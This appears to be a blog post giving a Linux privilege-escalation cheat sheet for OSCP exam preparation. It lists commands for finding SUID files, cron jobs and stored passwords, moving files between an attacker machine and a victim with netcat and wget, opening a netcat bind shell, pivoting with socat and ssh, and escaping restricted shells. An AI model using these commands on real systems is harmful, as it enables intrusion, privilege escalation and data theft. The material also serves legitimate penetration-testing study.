Linux Privilege Escalation Cheatsheet for OSCP

Hello Everyone,  below is the privilege escalation cheat sheet that I used to pass my OSCP certification. You can find lots of commands mixed to enumerate through a lot of situations. There might be few commands which might not be work on all the distortion of Linux. Feel free to comment below if I missed any useful commands.  If you are looking for the Linux Privilege Escalation Techniques here you go --> Linux Privilege Escalation Techniques and here is Windows Privilege Escalation command and Techniques  

Simple Linux Priv Esc Checklist

1. sudo -l

2.sudo su

3.  uname -a                   /version  --> check for vuln

4. Check for files with root priv

5. Check for cron jobs

6. /etc/passwd file --> writable ?

7. #PATH exploit

8.  Check for process with root

9.  Run pspy to check for running processes & cron jobs

10.Check .bash_history -la the home directory

12.Check /opt/, /var/www/html, /home/, /root, / ,  directories thoroughly 

13.Check for World Readable files 

14.Check if mysql is running as

15."mount" command to check for permissions on folders/processes 

16.Run "pspy -f"  on the target and check for all running file system tasks

17.Check for file/folder permissions, even u dont own the file, folder might be owned by you, where you
can add/delete files/filenames.

Ex: File is running as Root; folder owner is you.; delete the file and create a
new file with the same name. you can get root access. 


Linux Privilege Escalation Cheatsheet

sudo -l            --> Check for root priv directories and applications
sudo bash                --> Get Root Shell
sudo id                    --> Check Privilege level
Operating System Details 

uname -a            

cat /proc/version
ps aux | grep root             --> check for Applications running with root

ps -ef
dpkg -l        --> list all available packages.
python -c 'import pty;pty.spawn("/bin/bash")'   --> spwan a python shell; sometimes python3 works as well
Get Interactive Shell:

python -c 'import pty;pty.spawn("/bin/bash")'
ctrl +Z 
stty raw -echo
export TERM=xterm 
Finding Files with Root Privileges: 

find / -perm -4000 2>/dev/null | xargs ls -la
Finding World Readable Files:

find / -perm -2 ! -type l -ls 2>/dev/null

World Writable & Executable files
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null

World Executable Folders:
find / -perm -o x -type d 2>/dev/null
Find SUID & SGID  Binaries:

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done 

find / -perm -1000 -type d 2>/dev/null     #Only the owner of the directory or the owner of a file can delete or rename here.

find / -perm -g=s -type f 2>/dev/null      #SGID (chmod 2000) - run as the group, not the user who started it.

find / -perm -u=s -type f 2>/dev/null      #SUID (chmod 4000) - run as the owner, not the user who started it.
List the Capabilities of files  which has Root Privileges

getcap -r / 2>/dev/null 

Linux Capalilities - 40 Using Capabiliies 

#List all Capabilities 
#cap_sys_module is exploitable
capsh --print

Priv Esc using Sys_Module Capability in Docker
Find Services Running Behind Firewall/Localhost 

netstat -ano

netstat -tulpn
CRON Jobs 

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root 
find . -type f -ls         --> /Find files in all directories 
python -m SimpleHTTPServer 8080  --> Start a communication server on your system

wget http://yourip/  --> Run this in target machine to get this file
Send a File From Kali To Victim

nc -nlvp 9001 < exploit.c  --> Transfer files from Kali 

nc YourIpAddress 8001 > /tmp/exploit.c  --> Get the file On Target Machine
Get a File From Victim to Kali

on Kali: nc -l -p 8001 > filefoldername

on victim: nc -w 5 8001 < /usr/local/bin/filename 
When anything can only be run as a specific user:

sudo -u UserName /bin/bash             /works when you see this in sudo -l      
Port Scanning with NMAP:

for ip in $(seq 1 65535); do nc -nvzw1 VICTIM_IP $p 2>&1; done | grep open
Dynamic Port Forwarding 

nano /etc/proxychains.conf

#add the below line 
socks5 1080 

On Terminal:

ssh -D 1080 root@       /Need Password

proxychains netdiscover -r
Local Port Forwarding using ssh 

ssh -L 1080: root@
Remote Port Forwarding using SSH 

ssh -R 1080: root@
Port Forwarding using Netcat

nc -l -p $localport -c "nc $remotehost $remoteport"

netcat -nvlp 9001       /Listen on port 9001

netcat -l -p 9001 -e /bin/bash  /Create a bash shell on port 9001

netcat -L KALI_IP:80 -p 8902            /Forward local port 9002 to remote port 80

netcat -L kali_IP:80 -p 9002 -x        /Port Forward Hex dump
Port Forwarding using mknod 

mknod can be used to make files,directories and FIFO's(Named Pipe)

mknod backpipe p / p = create a named pipe

nc -l -p Allowed_Inbound_port 0<backpipe | nc 22 1>backpipe
 1 = Standard Output
 0 = Standard Input
Netcat Relay to Forward SSH on our linux machine with Scenario

you are on a windows box, trying to connect to a linux machine whose SSH-22 port inbound traffic is blocked. 
we have a shell on linux machine but not ssh -so trying to get into ssh 

so, find some port which is open on Linux machine, and use nc to communicate, ex:4444

on Linux Machine:

We need to transfer traffic from port 22 to 4444 and access it on windows machine.

mknod /tmp/backpipe p
nc -l -p 4444 0</tmp/backpipe | nc localhost 22 1>/tmp/backpipe
Port Forwarding using SoCat:

Start a socat listener on Victim_macine2 - Port 8009 & 8080, and listen it on First compromisted machine.

From Victim-1 machine: do a port scan as above and port forrward the required ports
/Binding the VICTIM-2 ports to Victim-1 Machine so,that we can access it from our Kali machine

socat tcp-listen:8009,fork tcp:VICTIM2_IP:8009 &  
socat tcp-listen:8080,fork tcp:VICTIM2_IP:8080 & 

netstart -plunt    /View the binded ports, we can see 8009 & 8080 in Victim_machine1

Access the Victim-2 Ports on our Kali Machine:on Victim-1 Machine: 

socat tcp-listen:4321,fork tcp:KALI_IP:4321 & 
Compiling Exploit 

gcc exploit.c -pthread -lcrypt -o Exploit  --> Compile The Exploit

gcc -m32 -Wl,--hash-style=both 9542.c -o exploit  --> Compiling 32-bit Exploit

Check for Unmounted Drives

cat etc/fstab 
cat .bash_history   -->  Check the Commands History
cho os.system("/bin/bash")       --> Escaping Limited Shell using ssh       
df -h                --> Get List of Machine Partitions (Mounted Devices as well) 
/dev/shm      --> can copy any files into this location and run without permissions
cat /dev/sdb               --> Might contain deleted data in the partition
                               can try strings /dev/sdb for flags
find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
          --> all files and dir with root access 
Grep Recursively for a string 

grep -iRI 'password'

#Grep for a username/string 
grep 'bhanu' /etc -R 2>/dev/null
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/sh 
                  --> get a proper shell from a restricted shell
mysql -u root -p               // logging as a root in mysql 

\! ls -l                       //Execute Commands 
Finding Passwords from a PCAP file using TCPDUMP:

tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P 'pwd=' 

If I missed something, feel free to command below and If you are looking for the Linux Privilege Escalation Techniques here you go --> Linux Privilege Escalation Techniques here is Windows Privilege Escalation command and Techniques

Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment